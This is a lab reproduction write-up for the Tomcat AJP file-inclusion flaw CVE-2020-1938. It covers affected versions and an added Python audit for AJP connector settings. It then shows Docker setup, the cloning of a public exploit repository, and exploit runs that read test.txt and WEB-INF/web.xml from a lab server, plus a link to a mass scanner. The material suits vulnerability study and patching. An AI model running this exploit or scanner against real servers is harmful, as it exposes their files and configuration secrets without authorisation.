Tomcat AJP Vulnerability Reproduction (CVE-2020-1938)

Vulnerability Overview

Tomcat is a free, open-source web application server. It is a lightweight application server that is widely used for small and medium-sized systems and for sites with a modest number of concurrent users, and it is the first choice for developing and debugging JSP applications. The AJP service that Tomcat enables by default (port 8009) contains a file inclusion flaw: an attacker can craft a malicious AJP request to trigger the file inclusion and read files from the web directory of an affected Tomcat server.

Affected Versions

  • Apache Tomcat 6
  • Apache Tomcat 7 < 7.0.100
  • Apache Tomcat 8 < 8.5.51
  • Apache Tomcat 9 < 9.0.31
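As an added defender-side example (not code from the original post), here is a small Python audit that checks a Tomcat version string against the affected ranges listed above and flags AJP connectors in server.xml that are reachable from all interfaces or have no shared secret, which are the hardening controls the fixed releases introduced. The server.xml snippets are constructed samples; address, secretRequired, secret and requiredSecret are the real Tomcat AJP connector attributes.

```python
import xml.etree.ElementTree as ET

# Affected ranges exactly as listed on this page; None means every release of that major.
AFFECTED = {6: None, 7: (7, 0, 100), 8: (8, 5, 51), 9: (9, 0, 31)}
LOOPBACK = ("127.0.0.1", "::1", "localhost")


def parse_version(version):
    """'8.5.32' -> (8, 5, 32) so versions compare as tuples."""
    return tuple(int(part) for part in version.split("."))


def is_affected(version):
    """True if the Tomcat version falls inside the affected ranges above."""
    ver = parse_version(version)
    if ver[0] not in AFFECTED:
        return False
    first_fixed = AFFECTED[ver[0]]
    return first_fixed is None or ver < first_fixed


def audit_ajp_connectors(server_xml):
    """Return findings for each AJP connector in a server.xml document."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if "AJP" not in conn.get("protocol", "").upper():
            continue  # HTTP connectors are not in scope for this CVE
        port = conn.get("port", "?")
        if conn.get("address") not in LOOPBACK:
            findings.append(f"AJP connector on port {port} is not bound to loopback")
        # 'secret' (8.5.51+ / 9.0.31+) or the older 'requiredSecret' attribute
        if not (conn.get("secret") or conn.get("requiredSecret")):
            findings.append(f"AJP connector on port {port} has no shared secret")
    return findings


# Constructed samples (not from the page): the stock AJP line of a pre-fix
# Tomcat, and a hardened one bound to loopback with a placeholder secret.
SAMPLE_DEFAULT = """<Server><Service name="Catalina">
<Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

SAMPLE_HARDENED = """<Server><Service name="Catalina">
<Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
<Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
           secretRequired="true" secret="REPLACE-WITH-LONG-RANDOM-SECRET"/>
</Service></Server>"""
```

The container started later in this post (Tomcat 8.5.32 with 8009 published on 0.0.0.0) would be flagged by both checks.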

Reproduction

[root@k8s-master-205 ~]# docker search tomcat-8.5.32
NAME                         DESCRIPTION            STARS               OFFICIAL            AUTOMATED
duonghuuphuc/tomcat-8.5.32   JRE8 + Tomcat 8.5.32   1 

[root@k8s-master-205 ~]# docker pull duonghuuphuc/tomcat-8.5.32 
Using default tag: latest
latest: Pulling from duonghuuphuc/tomcat-8.5.32
0bd44ff9c2cf: Pull complete 
047670ddbd2a: Pull complete 
ea7d5dc89438: Pull complete 
f14138372253: Pull complete 
c822581c11cd: Pull complete 
2bfebb1ccea8: Pull complete 
1d2a1447f71c: Pull complete 
610001504afa: Pull complete 
d319698013a7: Pull complete 
bd8134429270: Pull complete 
4db27f113924: Pull complete 
a3a2519c0610: Pull complete 
Digest: sha256:7ad4d0f3f3103fa3be5cdf9637d2f05d5b0cc416ee864ac6ce55ab0556046885
Status: Downloaded newer image for duonghuuphuc/tomcat-8.5.32:latest
docker.io/duonghuuphuc/tomcat-8.5.32:latest

[root@k8s-master-205 ~]# docker images
REPOSITORY                           TAG                 IMAGE ID            CREATED             SIZE
k8s.gcr.io/kube-proxy                v1.17.0             7d54289267dc        2 months ago        116MB
k8s.gcr.io/kube-controller-manager   v1.17.0             5eb3b7486872        2 months ago        161MB
k8s.gcr.io/kube-apiserver            v1.17.0             0cae8d5cc64c        2 months ago        171MB
k8s.gcr.io/kube-scheduler            v1.17.0             78c190f736b1        2 months ago        94.4MB
k8s.gcr.io/coredns                   1.6.5               70f311871ae1        3 months ago        41.6MB
k8s.gcr.io/etcd                      3.4.3-0             303ce5db0e90        4 months ago        288MB
quay.io/coreos/flannel               v0.11.0-amd64       ff281650a721        13 months ago       52.6MB
duonghuuphuc/tomcat-8.5.32           latest              262b3ba65963        19 months ago       463MB
k8s.gcr.io/pause                     3.1                 da86e6ba6ca1        2 years ago         742kB

[root@k8s-master-205 ~]# docker run -d -p 8080:8080 -p 8009:8009 --name cve20201938 duonghuuphuc/tomcat-8.5.32

[root@k8s-master-205 ~]# docker port cve20201938
8009/tcp -> 0.0.0.0:8009
8080/tcp -> 0.0.0.0:8080

[root@k8s-master-205 opt]# curl 192.168.11.205:8080

nmap -T4 -A -v 192.168.11.205
8009 tcp open ajp13 Apache Jserv 

[root@k8s-master-205 nmap-7.80]#  docker exec -it cve20201938 /bin/bash
root@b67a8e2def4d:/usr/local/tomcat# pwd
/usr/local/tomcat
root@b67a8e2def4d:/usr/local/tomcat# cd webapps/manager/
root@b67a8e2def4d:/usr/local/tomcat/webapps/manager# echo "this is cve20201938 test!" > test.txt
root@b67a8e2def4d:/usr/local/tomcat/webapps/manager# cd /usr/local/tomcat/webapps/ROOT/
root@b67a8e2def4d:/usr/local/tomcat/webapps/ROOT# echo "this is ROOT test for cve20201938" > test.txt
root@b67a8e2def4d:/usr/local/tomcat/webapps/ROOT# 

[root@Ansible-203 tmp]# git clone https://github.com/xindongzhuaizhuai/CVE-2020-1938.git
正克隆到 'CVE-2020-1938'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (3/3), done.

[root@Ansible-203 CVE-2020-1938]# python CVE-2020-1938.py -p 8009 -f test.txt 192.168.11.205
Getting resource at ajp13://192.168.11.205:8009/asdf
----------------------------
this is ROOT test for cve20201938

[root@Ansible-203 CVE-2020-1938]# python CVE-2020-1938.py -p 8009 -f WEB-INF/web.xml 192.168.11.205
Getting resource at ajp13://192.168.11.205:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
  version="3.1"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to Tomcat
  </description>

</web-app>

A Python 2 multithreaded scanner for the Tomcat AJP file-read vulnerability: https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner
